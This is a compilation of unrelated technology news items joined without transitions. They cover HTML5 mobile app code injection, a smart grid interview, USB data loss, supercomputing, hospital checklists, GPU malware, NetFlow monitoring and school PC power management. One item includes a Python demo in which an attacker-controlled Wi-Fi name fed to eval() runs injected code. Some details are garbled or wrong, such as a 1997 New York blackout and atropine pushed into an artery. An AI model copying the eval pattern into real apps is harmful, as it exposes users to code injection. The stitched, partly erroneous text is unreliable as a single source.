University researchers have found that HTML5-based mobile apps, which are expected to become more prevalent over the next several years, could add security risks for businesses.
Through developer error, the Web technology could automatically execute malicious code sent by an attacker via Wi-Fi, Bluetooth or a text message, researchers at Syracuse University reported last month at the Mobile Security Technologies Conference in San Jose, Calif.
"The malicious code can surreptitiously capture the victim’s sensitive information off their mobile device and ex-filtrate it to an attacker," Jack Walsh, a mobile security expert at ICSA Labs, said Monday in a blog post on the research. "Second, and potentially worse, the app may spread its malicious payload like a worm -- SMS text messaging itself to all of the user’s contacts."
Security weaknesses introduced in HTML5-based apps could become a bigger problem as their use grows. Because of the cross-platform nature of the Web technology, it is expected to be in more than half of all mobile apps by 2016, according to Gartner.
If the developers just want to process data, but use the wrong APIs, the code in the mixture can be automatically executed, the researchers said.
"If such a data-and-code mixture comes from an untrustworthy place, malicious code can be injected and executed inside the app," the researchers said.
The risk of developer error is not unique to HTML5 apps.
"An HTML5-based app is no different from a web-based application and the same security measures should apply to both," Bogdan Botezatu, senior e-threat analyst for Bitdefender, said.
Ways in which an attacker could send a malicious code-data string to an HTML5 app include an SSID field sent over a Wi-Fi access point, a QR code, JPEG image or as metadata within an MP3 music file. The SSID, or service set identifier, is used in connecting devices to a network.
Other places malicious code could be hidden are in an SMS message displayed by the app. The code could also be sent from an infected device via Bluetooth if the app attempts a pairing.
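The underlying mistake is language-agnostic: data from an untrusted channel (an SSID, an SMS, a scanned QR code) reaches an API that treats strings as code. The sketch below mimics the pattern in Python for brevity; in an HTML5 app the equivalent sinks would be code-evaluating or HTML-writing APIs, and the attack string here is invented for illustration.

    untrusted_ssid = "evil' + __import__('os').getcwd() + '"  # attacker-controlled string

    def vulnerable_display(ssid):
        # Wrong API: the string is spliced into code and evaluated.
        return eval("'Connected to " + ssid + "'")

    def safe_display(ssid):
        # Right API: the data stays data.
        return "Connected to " + ssid

    print(vulnerable_display(untrusted_ssid))  # the attacker's expression runs as a side effect
    print(safe_display(untrusted_ssid))        # the raw string is shown harmlessly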
In order for HTML5-based apps to be cross-platform, they require a middleware framework that lets them connect to the underlying system resources, such as files, device sensors and the camera.
Google Android, Apple iOS and Windows Phone have different containers that apps use for accessing services, so developers let the framework creators handle the plumbing underneath the Web app.
Examples of frameworks include PhoneGap, RhoMobile and Appcelerator. The researchers studied 186 PhoneGap plugins and found 11 that were vulnerable to the code-injection attack.
While the researchers only used PhoneGap and Android for their work, the same problems were applicable across operating systems.
"Since apps are portable across platforms, so are their vulnerabilities," the researchers said. "Therefore, our attacks also work on other platforms."
This story, "Why businesses should use caution with HTML5-based mobile apps," was originally published by CSO.
At a very young age, Massoud Amin, director of the Technological Leadership Institute, realized that electricity was vital to modern society. Growing up and traveling in Iran in the 1960s, he saw how access to electricity transformed society, from farming and schools to businesses and medical facilities. While he was a teen visiting New York City, lightning caused a 24-hour blackout, during which Amin observed how much the world depends on reliable electricity to support economies and quality of life. The experience reinforced his passion for electrical infrastructure, and he has been committed ever since to helping improve the grid.
Amin is a senior member of IEEE, the Institute of Electrical and Electronics Engineers, a professional organization dedicated to technology innovation, and chairman of the IEEE Smart Grid Newsletter.
In a recent interview with Government Technology, Amin talks about IEEE (pronounced I-triple-E) and the smart grid — its complexities, governance and broadband implications.
1. What is IEEE, in a nutshell?
IEEE refers to itself as “the world’s largest professional association dedicated to advancing technological innovation and excellence for the benefit of humanity.” The organization has about 400,000 members in fields as diverse as aerospace, biomedical engineering, computing, consumer electronics, electric power, and telecommunications. It is well known for its professional and educational activities, its peer-reviewed and general-interest technology publications, the conferences it hosts around the world, and its standards development organization.
2. How do you define the smart grid?
The smart grid is a next-generation electrical power system that uses digital technologies — such as computers, secure communications networks, sensors and controls, in parallel with electric power grid operations — to enhance the grid’s reliability and overall capabilities. The smart grid extends to fuel sources for electric power production and the many devices that use electricity, such as household refrigerators, manufacturing equipment or a city park’s lighting fixtures.
In particular, the secure digital technologies added to the grid and the architecture used to integrate these technologies into the infrastructure make it possible for the system to be electronically controlled and dynamically configured. This gives the grid unprecedented flexibility and functionality and self-healing capability. It can react to and minimize the impact of unforeseen events, such as power outages, so that services are more robust and always available.
The smart grid also has very important features that help the planet deal with energy and environmental challenges and reduce carbon emissions. To give a few examples, a stronger and smarter grid, combined with massive storage devices, can substantially increase the integration of wind and solar energy resources into the [power] generation mix. It can support a wide-scale system for charging electric vehicles. Utilities can use its technologies to charge variable rates based on real-time fluctuations in supply and demand, and consumers can directly configure their services to minimize electricity costs.
3. What’s the IEEE’s role in smart grid?
IEEE is involved in virtually every aspect of smart grid. Its engineers in academia, government and private industry are helping guide its evolution and standardize its technologies and they are deeply engaged in designing, testing and deploying smart grid projects around the world.
IEEE members have published around 2,500 papers on smart grid topics in more than 40 IEEE journals. I’d like to mention, in particular, the IEEE Smart Grid Newsletter, a monthly newsletter, which provides up-to-date news about the smart grid, results of field tests, as well as forward-looking commentary on important issues. It is published on the IEEE Smart Grid Web Portal, which the IEEE hosts as a comprehensive information gateway to smart grid resources and expertise.
4. Why is it important to have national smart grid standards and is an international body needed to govern standards?
Technology standards are needed so that products can interoperate and businesses can distribute their products to multiple countries or regions. The economies of scale that standardization creates can drive down costs, which benefits everyone. And because more vendors might participate in a market, customers have more product choices. Also, when a technology is standardized, customers can have more confidence that their products will function as expected.
The IEEE Standards Association has more than 100 smart grid standards developed or in development, and these will support a wide range of technologies and services that will be used throughout a smart grid system. Many other regional and international standards development organizations are also creating smart grid standards. IEEE and other leading groups are working together on smart grid standards because they recognize that collaboration is necessary to make sure smart grid succeeds.
This type of collaboration represents a new paradigm in standards development today. Collaboration is seen as a practical means of solving problems that are common to all participating groups and stakeholders, regardless of the formal status of a particular standard within an industry or country.
5. How is the smart grid community addressing interoperability and security as it pertains to the smart grid? What role, if any, is IEEE playing there?
The IEEE Standards Association (IEEE-SA) has published an architectural framework for the smart grid, called IEEE 2030, which defines the interconnection and interoperability standards for the power, IT and communications technologies that will be used in smart grids.
IEEE-SA is working actively on standardization with the NIST Smart Grid Interoperability Panel, which includes IEEE-SA standards in its catalog of smart grid standards. IEEE-SA also collaborates with many standards organizations that represent specific industries, countries or regions to help make sure that products that operate on smart grids are complementary and compatible with one another.
Security, which includes privacy and cybersecurity, is fundamentally necessary for reliable grid operations and for customer acceptance of smart grids, and many in IEEE and the smart grid community are developing technologies and standards addressing this issue. What’s most important, however, is that security is incorporated into the architectures and designs at the outset, not as an afterthought. For the microgrids [distributed resource island system] I’m involved with, we employ security technologies for each equipment component we use and for each customer application we develop — and we do this in a way that cannot be reverse engineered. We use an architecture that cannot be taken down. If any part of the system is compromised, the system reconfigures to protect itself, localize and fend off the attacks.
6. What implications does broadband have on the grid?
Utilities will use a variety of wired and wireless, broadband and narrowband communications technologies for their smart grids. Communications networks will carry information to and from the many sensors, control technologies, and metering devices that will be used in a smart grid, including devices used in homes and businesses.
A utility will use broadband connections to engage with customers for smart grid services. Customers will use network-connected applications on in-home energy monitors, home computers and smartphones to interact with demand-response or energy management programs.
Utilities will likely use a combination of broadband communications technologies, including their own infrastructure for broadband over-the-power-line communications. They will also use a variety of fiber-optic, wireline and wireless technologies for broadband communications.
7. What’s the simplest thing about the smart grid and what’s the most complex thing about it?
The simplest thing about smart grid is consumers’ general expectations for their electric services. Basically consumers expect that when they turn on an appliance or product that uses electricity, it will work without any disruptions of service, it will be safe and secure and affordable.
What’s complicated is achieving the infrastructure needed to deliver on those expectations. We have established the general architecture needed for smart grids and have begun putting the initial technologies, like smart meters, in place. But it will take five to 10, possibly 20 years, depending on the level of effort, to deploy the technologies to create complete, end-to-end smart grids. And we need to come up with some truly breakthrough engineering achievements to solve some of our toughest smart grid challenges. This all ties back to the need for public and private partnerships and financing to support smart grid research and deployments and training.
8. In that vein, there are always pros and cons of a solution. What are those as related to the smart grid?
The smart grid will create a more stable and efficient electric power system. It will significantly reduce the number of power outages experienced in the United States and, if an outage does occur, the smart grid will minimize its impact to such a degree that most consumers will not know that it happened. Outages, such as the one affecting New York City in 1997, would be avoided.
I’ve mentioned that smart grids will introduce energy efficiencies to better support the increasing demands for electricity while reducing environmental impacts. And consumers will have opportunities to use in-home energy-management tools, programmable appliances and other applications that improve their quality of life.
Unfortunately around 68 percent of consumers have no idea what a smart grid is and their understanding is needed to help gain acceptance for the technology. We need leadership in the private and public sectors to educate consumers, as well as incentives and other mechanisms to bring smart grid into reality.
9. It’s not just important to have a smart grid. What other factors will contribute to truly having a smart grid?
Smart grids provide energy security because they help a country reduce its dependence on foreign energy supplies. They also protect a country’s economic interests and the environment. To build a truly smart grid, we need a better backbone for the grid and we must also build intelligence into the system end-to-end.
The desired system will require a high-voltage power grid that can serve as its backbone and also efficiently integrate renewable resources into the grid. It will likely cost about $82 billion, or $8 billion per year for 10 years, to achieve the upgrades needed for the high-voltage system serving the U.S.
Making the grid smarter — which will be achieved by replacing traditional analog components with digital ones and incorporating the computing, IT, sensors and other equipment — will have a separate price tag. This will cost about $338 billion to $476 billion over the next 20 years, or about $17 billion to $24 billion annually.
It seems exorbitant, but the investment will pay for itself. These technologies are expected to reduce outage costs by about $49 billion per year and save about $20.4 billion per year from improved energy efficiencies. These technologies will also produce the intangible benefits of increased security, reductions in carbon dioxide emissions, and related environmental improvements.
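Using only the figures quoted above, a quick benefit-to-cost check supports that claim; this is rough arithmetic, not a formal cost-benefit analysis.

    annual_cost_low, annual_cost_high = 17e9, 24e9   # smart grid spend per year
    annual_benefit = 49e9 + 20.4e9                   # avoided outage costs + efficiency savings

    print(f"benefit/cost at the high spend: {annual_benefit / annual_cost_high:.1f}x")
    print(f"benefit/cost at the low spend:  {annual_benefit / annual_cost_low:.1f}x")
    # Roughly 2.9x to 4.1x per year, which is why the investment is argued to pay for itself.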
10. Why is it important for states and localities to build a smart grid infrastructure?
I’ve mentioned the overloaded grid conditions we have today. Yet the situation is certain to get much worse, especially with the increasingly digital society. Twitter alone puts a demand of 2,500 megawatt hours per week on the grid that didn’t exist before. Because of increasing demand, experts believe that the world’s electricity supply will need to triple by 2050.
Localities should build microgrids because these facilities can meet community energy demands in an eco-friendly way that also provides cost advantages to consumers and families. I also believe that local commitments to microgrids will help the country overall by showcasing their capabilities and just proving that it can be done. Cities, communities, and universities are great candidates for microgrids because their microgrid projects can be manageable in size and the local participants are passionate about the opportunity and want their programs to succeed.
Local entities also can use their microgrids to develop and test innovations for consumers, such as smart homes, and the results of these programs can be used in developing other smart grid projects around the country.
“The biggest threat posed by USBs is data leakage, loss, and/or theft, where data is leaving some secure location and being physically carried away from that location”, explained Ashdown.
“There are different ways this can happen. This can be someone stealing data, or this can be somebody who put data on a device, took the device home with them, and left the device on a bus or subway”, he told Infosecurity.
To prevent data loss, organizations need to apply security measures to these devices. These measures can include encrypting the data and requiring user authentication to access the device, he explained.
However, encryption can be broken and user authentication measures can be bypassed. So being able to wipe these devices if they are lost or stolen is an additional security measure that can be used to safeguard sensitive corporate information, Ashdown said.
Imation provides USB devices that have remote kill/wipe capability, he said. “High security customers want the remote kill to know that the device is no longer usable”, he explained.
“Remote kill is an effective tool to allow an IT department to kill the device and prevent access to it even from the normally authorized user”, Ashdown said. This helps thwart the insider threat, he noted.
Imation offers remote kill capability that can destroy the data and the root key on the USB device, rendering the device useless. The company also offers the ability to lock access to the device, but also to retrieve the data at a later point, he said.
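Conceptually, a remote kill can be as simple as a device check-in that, on a "kill" verdict, destroys the key protecting the stored ciphertext. The Python sketch below is a generic illustration with invented names, not Imation's actual protocol.

    import os

    def check_in(device_id, fetch_status, key_store):
        status = fetch_status(device_id)             # e.g., an HTTPS call in a real product
        if status == "kill":
            key_store["root_key"] = os.urandom(32)   # overwrite the key material...
            del key_store["root_key"]                # ...then discard it; data is unrecoverable
            return "device disabled"
        if status == "lock":
            return "access locked; data retained for possible later recovery"
        return "ok"

    key_store = {"root_key": b"\x01" * 32}
    print(check_in("usb-0042", lambda _id: "kill", key_store))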
A team led by Thomas Schulthess of Oak Ridge National Laboratory (ORNL) has broken the petaflop barrier with a supercomputing application likely to accelerate the revolution in magnetic storage.
Using ORNL’s upgraded Cray XT Jaguar supercomputer, the team was able to achieve a sustained performance of 1.05 quadrillion calculations a second, or 1.05 petaflops, for an application that simulates the behavior of electron systems. Jaguar itself was recently upgraded to a peak performance of 1.64 petaflops, making it the world’s first petaflop system dedicated to open scientific research. The team’s simulation ran on nearly 150,000 of Jaguar’s 180,000-plus processing cores.
Among its benefits, the application promises to advance scientific understanding of magnetic devices such as computer hard drives. In the last couple of decades, hard drive storage capacity has grown at an extraordinary rate. The associated risk, though, is that with increasing storage density, these amazing devices tend to become less stable.
Hard drives hold information by magnetizing tiny regions of a platter, with regions magnetized in one direction counting as ones and in the opposite direction as zeroes. With the exponential growth of storage capacity, these minuscule spots have gotten progressively smaller; the smaller the spot, the more likely its magnetic direction is to be incorrectly and unexpectedly reversed. Since disorder at the atomic scale increases with temperature, a hard drive kept as warm as room temperature becomes increasingly susceptible to random changes — meaning lost data — as storage density rises.
“A big problem in magnetic recording is that as you make the bits smaller and smaller, thermal excitation will essentially randomize them and you will lose information,” explained Markus Eisenbach of ORNL. “If that happens in 500 years you don’t care, but if it happens tomorrow you’re really unhappy.”
The team’s current approach differs fundamentally from earlier efforts because it is able to set aside empirical models and their attendant approximations to tackle the system through first-principles calculations. Eisenbach, who serves as the team’s developer for the project, noted that such a first-principles approach was far too computationally intensive for earlier computer systems.
“It’s the new Jaguar coming on line that makes it really feasible,” he said. “If you have a classical Heisenberg model, an energy calculation takes perhaps milliseconds. For this first-principles calculation, an energy calculation takes tens of seconds. So it’s orders of magnitude slower. You really need a computer of that size.”
The team simulates the effect of heat on a magnetic material by combining two methods. The first — known as locally self-consistent multiple scattering, or LSMS — describes the journeys of scattered electrons by applying density functional theory to solve the Dirac equation, a relativistic wave equation for electron behavior. The code has a robust history, having been the first code to run at a sustained trillion calculations per second, a feat that earned its developers the prestigious Gordon Bell Prize in 1998.
The shortcoming of this approach, though, is that it is used primarily to describe a system in its ground state at a temperature of absolute zero, or nearly minus 460°F. In order to include the energy brought to the system by temperatures outside a laboratory freezer, the team’s simulations incorporate a Monte Carlo method known as Wang-Landau, which guides the LSMS application to explore electron behavior at a variety of temperatures.
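For readers unfamiliar with the method, the toy Python sketch below runs Wang-Landau sampling on a small Ising ring: the random walk builds an estimate of the density of states g(E), from which behavior at any temperature can later be derived. It is a pedagogical sketch, not the ORNL production code, and it omits the usual histogram-flatness check.

    import math, random

    N = 12                                        # spins on a small Ising ring
    spins = [random.choice((-1, 1)) for _ in range(N)]

    def energy(s):
        return -sum(s[i] * s[(i + 1) % N] for i in range(N))

    ln_g, hist = {}, {}                           # running estimates, keyed by energy
    ln_f = 1.0                                    # modification factor, halved each stage
    E = energy(spins)

    for stage in range(10):                       # ln_f shrinks from 1.0 to ~0.001
        hist.clear()
        for _ in range(20000):
            i = random.randrange(N)
            spins[i] *= -1                        # propose a single spin flip
            E_new = energy(spins)
            # Accept with probability min(1, g(E)/g(E_new)) to flatten the walk.
            if math.log(random.random()) <= ln_g.get(E, 0.0) - ln_g.get(E_new, 0.0):
                E = E_new
            else:
                spins[i] *= -1                    # reject: undo the flip
            ln_g[E] = ln_g.get(E, 0.0) + ln_f
            hist[E] = hist.get(E, 0) + 1
        # A production code would check histogram flatness here before refining.
        ln_f /= 2.0

    print(sorted(ln_g))                           # the energy levels the walk has visited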
According to Eisenbach, the two methods are ideally suited to massively parallel computing systems. They scale linearly, meaning the need for computing resources grows at the same rate as the size of the system being simulated, and LSMS can be scaled to very large materials systems by assigning one atom to each processing core.
As a result, the team is able to use the petascale Jaguar system to simulate nanoparticles approaching technologically interesting sizes.
“We’re really getting to a size where you could do calculations for nanoparticles that are also the focus of experiment,” Eisenbach noted. “Experiments come from large systems and manage to get smaller and smaller, and we are coming from just a few atoms and getting to the point where experimentally accessible sizes and computationally accessible sizes meet.”
He would not predict what the project will find, since the team is taking a new approach to the problem. Nevertheless, he noted that hard drive manufacturers are watching this issue closely; as hard-drive capacity continues to grow, the importance of a more complete understanding of magnetic materials will also grow.
“The idea is to find materials that make it sufficiently hard for random temperature fluctuations to turn the bits around, so the information is still on your hard disk when you look at it next year. We have been talking with people at hard disk manufacturers. Certainly, it’s an important issue that gets discussed at magnetism conferences.”
Consider three different scenarios that place healthcare patient safety at risk. The first is an individual hazard, the second human behavior, and the third a system issue in the broad sense of "system" as distinct from information technology (IT).
The first is placing concentrated potassium alongside diluted solutions of potassium-based electrolytes. You need to know that intravenous administration of the former (concentrated potassium) stops the heart almost instantaneously. In one tragic case, for example, an individual provider mistakenly selected a vial of potassium chloride instead of furosemide, both of which were kept on nearby shelves just above the floor. A mental slip, the erroneous association of the potassium on the label with the potassium-excreting diuretic, likely resulted in the failure to recognize the error until she went back to the pharmacy to document removal of the drug. By then it was too late.
Second, a pharmacist supervising a technician, working under stress and tight time deadlines due to short staffing, does not notice that the sodium chloride concentration in a chemotherapy solution is not 0.9% as it should be but over 23%. After the solution is administered, the patient, a child, experiences a severe headache and thirst, lapses into a coma, and dies. This results in legislation in the state.
Finally, in a patient quality assurance session, the psychiatric residents on call at a major urban teaching hospital dedicated to community service expressed concern that patients were being forwarded to the psychiatric ward without proper medical (physical) screening. People with psychiatric symptoms can also be sick with life-threatening physical disorders. In most cases, it was 3 AM and the attending physician was either unresponsive or dismissive of the issue. In one instance, the patient had a heart rate of 25 (where 80 or more would be expected) and a Code had to be declared. The nurses on the psychiatric unit were not allowed to push a mainline insertion into the artery to administer the atropine, and the harried resident had to perform the procedure himself. Fortunately, this individual knew what he was doing and likely saved a life. In another case, the patient was delirious, and a routine neurological exam, performed on the psychiatric unit rather than in the emergency room where it ought to have been done, resulted in his being rushed into the operating room to save his life.
In all three cases, training was more than adequate, and additional training would not have made a difference. The individual knew concentrated potassium was toxic but grabbed the wrong container, the pharmacist knew the proper mixture, and the emergency room knew how to conduct basic physical (neurological) exams for medical well-being. What, then, is the recommendation?
One timely suggestion is to manage quality and extreme complexity by means of checklists. A checklist of high-alert chemicals can be assembled and referenced. Wherever a patient is being delivered a life-saving therapy, sign-off on a checklist of steps in preparing the medication should be mandatory. Reviewing the physical status of patients in the emergency room is perhaps the easiest of all to accommodate, since vital signs and status are readily definable. Note that such an approach should include a "safe harbor" for the acknowledgment of human and system errors, as is routinely done in the case of failures of airplane safety, including crashes. Otherwise, people will be people and try to hide the problem, making a recurrence inevitable.
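To make the idea concrete, here is a minimal sketch (Python, purely illustrative; the step wording, field names and class design are assumptions, not taken from any real hospital system) of how a mandatory sign-off checklist for preparing a high-alert medication might be represented, including a safe-harbor field for blame-free error reports:

```python
from dataclasses import dataclass, field

@dataclass
class ChecklistItem:
    text: str
    done: bool = False
    signed_by: str = ""

@dataclass
class MedicationChecklist:
    medication: str
    items: list
    safe_harbor_notes: list = field(default_factory=list)  # blame-free error reports

    def sign_off(self, index: int, clinician: str) -> None:
        # Each preparation step must be individually signed before release.
        self.items[index].done = True
        self.items[index].signed_by = clinician

    def complete(self) -> bool:
        return all(item.done for item in self.items)

chk = MedicationChecklist(
    "potassium chloride (concentrated)",
    [ChecklistItem("Verify drug name and concentration against the order"),
     ChecklistItem("Confirm dilution before administration"),
     ChecklistItem("Second clinician double-check")])
chk.sign_off(0, "RN Smith")
print(chk.complete())   # False until every step is signed off
```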
The connection with healthcare information technology (HIT) is now at hand. IT professionals have always been friends of checklists. Computer systems are notoriously complex and often far from intuitive; hence the importance of asking the right questions at the right time when troubleshooting an IT system. Healthcare professionals are also longtime friends of checklists for similar reasons, both by training and experience. Sometimes symptoms loudly proclaim what they are, but often they can be misleading or anomalous. The differential diagnosis separates the amateurs from the veterans. Finally, we arrive at a wide area of agreement between these two professions, eager as they are to find some common ground.
Naturally, a three-ring binder on a shelf with hard copy is always a handy backup; however, the computer is a ready-made medium for delivering advice, including a top-ten list of things to watch, in real time to a stressed provider. In the case of emergency rooms and clinics, the hospital information system (HIS) is the platform of choice on which to install, update, and maintain the checklist electronically. However, this means that the performance of the system needs to be consistent with delivering the information in real time or near real time. It also means that the provider should be trained in the expert fast path to the information and not need to hunt and peck through too many screens. The latter, of course, would be equivalent to not having a functioning list at all.
And this is where a dose of training in information technology will make a difference. The prognosis is especially favorable if the staff already have a friendly, or at least accepting, relationship with the HIS. It reduces paperwork, improves workflow, and allows information sharing to coordinate the care of patients.
This is also a rich area for further development and growth as systems provide support to the physician in making sure all of the options have been checked. The system does not replace the doctor, but acts like a co-pilot or navigator, performing computationally intense tasks that would otherwise take too much time in situations of high stress and time pressure. Obviously, issues of high-performance response on the part of the IT system and usability (from the perspective of the professional staff) loom large here. Look forward to further discussion on these points. Meanwhile, we now add another item to the vendor selection checklist for choosing an HIS: it must be able to provide templates (and, where applicable, content) for clinical checklists by subject matter area.
It should be noted that "the checklist manifesto" is the recommendation of a book of the same title by the celebrity physician Atul Gawande.
"Potassium may no longer be stocked on patient care units, but serious threats still exist" Oct 4 2007, http://www.ismp.org/newsletters/acutecare/articles/20071004.asp
"An Injustice has been done," http://www.ismp.org/pressroom/injustice-jailtime-for-pharmacist.asp
Posted August 16, 2010 1:08 PM
Malware that runs inside GPUs (graphics processing units) can be harder to detect, but is not completely invisible to security products.
Researchers from Intel division McAfee Labs teamed up with members of Intel's Visual and Parallel Computing Group to analyze a proof-of-concept GPU malware program dubbed JellyFish that was released in March.
Their conclusion, which was included in McAfee's latest quarterly threat report, is that running malicious code inside GPUs still has significant drawbacks and is not nearly as stealthy as its developers suggested.
JellyFish's creators claimed that one of the advantages of GPU malware is that it can snoop on the host computer's memory through a feature called DMA (direct memory access).
While this is true, exposing critical portions of the system's memory to the GPU requires kernel privileges and must be done through a process that runs on the host computer.
Security products can monitor for and restrict such operations, the Intel researchers said. Furthermore, "this dependency is subject to existing kernel protections."
If the installation of the GPU malware is achieved without detection, the user code and kernel driver used in the process can theoretically be deleted from the host operating system. However, this might cause problems.
For example, on Windows, orphaned GPU code triggers a Timeout Detection and Recovery (TDR) process that resets the graphics card, the McAfee researchers said. The default timeout before this mechanism kicks in is two seconds and any attempt to alter that value can be treated as suspicious behavior by security products, they said.
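As an illustration of the kind of check a security product could make, the sketch below (Python, Windows-only) reads the TdrDelay registry value that governs the Timeout Detection and Recovery window and flags a lengthened timeout. The registry path and value name are the standard TDR settings; the simple threshold test is an assumption for illustration, not how any particular product works:

```python
import winreg

# Registry location of the GPU watchdog (TDR) settings on Windows.
KEY = r"SYSTEM\CurrentControlSet\Control\GraphicsDrivers"

def tdr_delay_modified(threshold_seconds: int = 2) -> bool:
    """Return True if the TDR timeout has been raised above the default."""
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY) as key:
            value, _type = winreg.QueryValueEx(key, "TdrDelay")
    except FileNotFoundError:
        return False  # value absent: the default timeout is in effect
    return value > threshold_seconds

if tdr_delay_modified():
    print("suspicious: GPU TDR timeout has been lengthened")
```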
In addition, long-running GPU processes will lead to the OS graphical user interface becoming non-responsive, which can betray the presence of malware.
Therefore, the best option for attackers would be to keep a process running on the host computer, the researchers said. This code can be minimal and harder to detect than a full-blown malware program, but is nevertheless something that security products can identify.
Another claim made by the JellyFish developers was that code stored on the GPU persists across system reboots. This refers to data storage rather than code that automatically executes, according to the Intel researchers.
"The idea of persistence claimed here is that a host application is running at system startup, retrieving data from GPU memory, and mapping it back to userspace, which is not nearly as daunting because malicious usermode code must also persist outside of the GPU," they said.
While it's true that there is a shortage of tools to analyze code running inside GPUs from a malware forensics perspective, endpoint security products don't need such capabilities because they can detect the other indicators left by such attacks on the system.
On one hand, moving malicious code inside the GPU and removing it from the host system makes it harder for security products to detect attacks. But on the other, the detection surface is not completely eliminated and there are trace elements of malicious activity that can be identified, the researchers said.
Some of the defenses built by Microsoft against kernel-level rootkits, such as Patch Guard, driver signing enforcement, Early Launch Anti-Malware (ELAM) and Secure Boot, can also help prevent the installation of GPU threats. Microsoft’s Device Guard feature in Windows 10, which allows only Microsoft-signed and trusted applications to run, can be particularly effective against such attacks, according to the researchers.
While both attackers and defenders will likely continue to refine their moves on the GPU battleground, the researchers said that the recent focus on this area has made the security community consider improving its approach to these threats.
What is NetFlow?
NetFlow is a network protocol developed by Cisco in order to collect and monitor IP network traffic. By utilizing NetFlow, IT teams can analyze traffic flow and determine the traffic source, traffic direction, and how much traffic is being generated. To help you better understand the NetFlow process, I like to use the following analogy from our Product Manager, Ulrica de Fort-Menares.
Think of NetFlow the way you think of a phone bill. When you get your phone bill, you usually see a record of conversations listed. The information regarding these conversations includes the time the call occurred, who was called, how long the conversation was, the actual metadata from the phone call–but not the actual audio data packet.
Why is this concept like NetFlow?
Much like the phone bill, the header information for data packets that traverse a device is stored in the device's cache and then exported to a collector. A collector is very important for analyzing NetFlow data. Without one, you could attempt to inspect the cache directly to see what data is currently traversing the device, but that is highly ineffective and time-consuming.
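To make the collector's role concrete, here is a minimal sketch of one in Python. It listens on UDP port 2055 (a conventional NetFlow port), handles only NetFlow v5, and prints a few fields from each flow record; a production collector obviously does much more (v9/IPFIX templates, storage, analysis), so treat the port choice and field selection as illustrative assumptions:

```python
import socket
import struct

HEADER = struct.Struct("!HHIIIIBBH")             # 24-byte NetFlow v5 header
RECORD = struct.Struct("!IIIHHIIIIHHBBBBHHBBH")  # 48-byte NetFlow v5 flow record

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("0.0.0.0", 2055))

while True:
    data, exporter = sock.recvfrom(4096)
    version, count, *_ = HEADER.unpack_from(data, 0)
    if version != 5:
        continue                                  # only v5 handled in this sketch
    for i in range(count):
        rec = RECORD.unpack_from(data, HEADER.size + i * RECORD.size)
        src = socket.inet_ntoa(struct.pack("!I", rec[0]))
        dst = socket.inet_ntoa(struct.pack("!I", rec[1]))
        octets, srcport, dstport, proto, tos = rec[6], rec[9], rec[10], rec[13], rec[14]
        print(f"{src}:{srcport} -> {dst}:{dstport} proto={proto} tos={tos} bytes={octets}")
```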
What about other flow types–sFlow, jFlow?
While NetFlow is a commonly used name for flow export, NetFlow is vendor specific to Cisco. jFlow is vendor specific to Juniper and sFlow is an industry-standard flow. The key difference between sFlow and NetFlow is that sFlow is sampled flow and NetFlow is not sampled. Fortunately, our network management platform, LiveNX, is vendor agnostic when it comes to our flow collection and if your device supports any type of flow export the data can be collected by LiveNX. Please see our specifications page for more information.
What do I do with the flow data?
You could attempt to analyze a pcap if you had plenty of time, or more realistically you could use a flow collector to store and analyze the metadata to make sense of the information. For example, in the image below, I have a real-time view of a Palo Alto firewall being monitored by LiveNX. In the data set, I see a blue highlighted row that represents a conversation traversing through the firewall. Notice the information contained in this flow includes source and destination IP address, source and destination ports, TOS, utilization and even an application name—all of this is derived from flow!
You can learn more about our real-time flow monitoring here.
Using LiveNX you are able to take that flow metadata and visualize it across a topology to track a conversation through the network. For example, in the image below, I’m focused on user voice calls between the LA and Toronto offices utilizing a filter based on subnets and ports. Notice anything strange about the DSCP markings?
Watch more on how we visualize flows here.
Using flow data, it’s also possible to better understand and manage WAN bandwidth (BW). In the example below, I’m able to see that most of the outbound data on the GE0/0 is video-over-http. I can also see the total utilization for a specified time range, as well as average and peak-rate information.
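As a sketch of how raw flow records turn into those utilization numbers, the snippet below rolls made-up records into per-application totals plus average and peak rates. The sample data, the field names and the ten-minute window are all illustrative assumptions rather than anything exported by a real device or LiveNX:

```python
from collections import defaultdict

flows = [  # hypothetical flow records for one interface, outbound
    {"app": "video-over-http", "bytes": 1_200_000_000, "start": 0,   "end": 300},
    {"app": "voice",           "bytes":    45_000_000, "start": 60,  "end": 360},
    {"app": "video-over-http", "bytes":   800_000_000, "start": 300, "end": 600},
]
WINDOW = 600  # seconds covered by the report

per_app = defaultdict(int)
peak_mbps = 0.0
for f in flows:
    per_app[f["app"]] += f["bytes"]
    duration = max(f["end"] - f["start"], 1)
    peak_mbps = max(peak_mbps, f["bytes"] * 8 / duration / 1e6)

for app, total in sorted(per_app.items(), key=lambda kv: -kv[1]):
    print(f"{app}: {total / 1e9:.2f} GB, {total * 8 / WINDOW / 1e6:.1f} Mbps average")
print(f"peak single-flow rate: {peak_mbps:.1f} Mbps")
```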
Watch more about WAN BW Management here.
As more and more applications fight for expensive BW, flow data becomes the path of enlightenment in the network. In the past, deriving this information would have required the deployment and management of probes. Now, just by enabling features already available on your devices, you can export flow data to a solution like LiveNX—ultimately helping you to analyze and make sense of the collected metadata.
Read more about sFlow here: http://www.sflow.org/about/index.php
View the NetFlow RFC here: https://www.ietf.org/rfc/rfc3954.txt
Date: October 26, 2016
Author: Alex Cameron
Many kids don’t worry about powering down the computers they use at school when it’s time to go home. For that matter, some teachers don’t either.
Why worry about it? Think green.
Computers that are left on overnight can add up to thousands of dollars in extra energy costs — a big problem for public schools that are seeing budget freezes and looking for cost-saving measures. The waste can also sink a sustainability plan.
In Colorado, Boulder Valley School District officials think they have found a viable solution. The district completed a one-year rollout plan to implement power management software in 10,000 PCs to improve sustainable efforts and cut costs.
The school district — which educates 27,000 students and employs 4,000 staff — is responsible for 57 facilities within the communities of Boulder, Louisville, Lafayette, Erie, Superior, Broomfield, Nederland, Ward, Jamestown and Gold Hill. In 2009, the district created the Sustainability Management System, an initiative to incorporate sustainability into education and operations, said Ghita Carroll, the district’s sustainability coordinator. The system’s plan is outlined in a 167-page report.
“When we started implementing our Sustainability Management System, one of the first things we did was to work with our IT department,” she said. “We looked to see what the technology options were.”
According to the school district’s CIO, Andrew Moore, computers were wasting a significant amount of energy.
“Our community is green oriented and felt that too many resources were being wasted by idle computers using too much energy,” he said in a statement. “Previously district computers were left on in full-power mode 24 hours a day, seven days a week.”
After a series of energy audits and assessments, the district’s IT department and Office of Sustainability decided to implement software, called Verismic Power Manager, that remotely shuts down school computers when they’re not in use. Through a single interface, the district’s IT department controls the power settings for all 10,000 PCs.
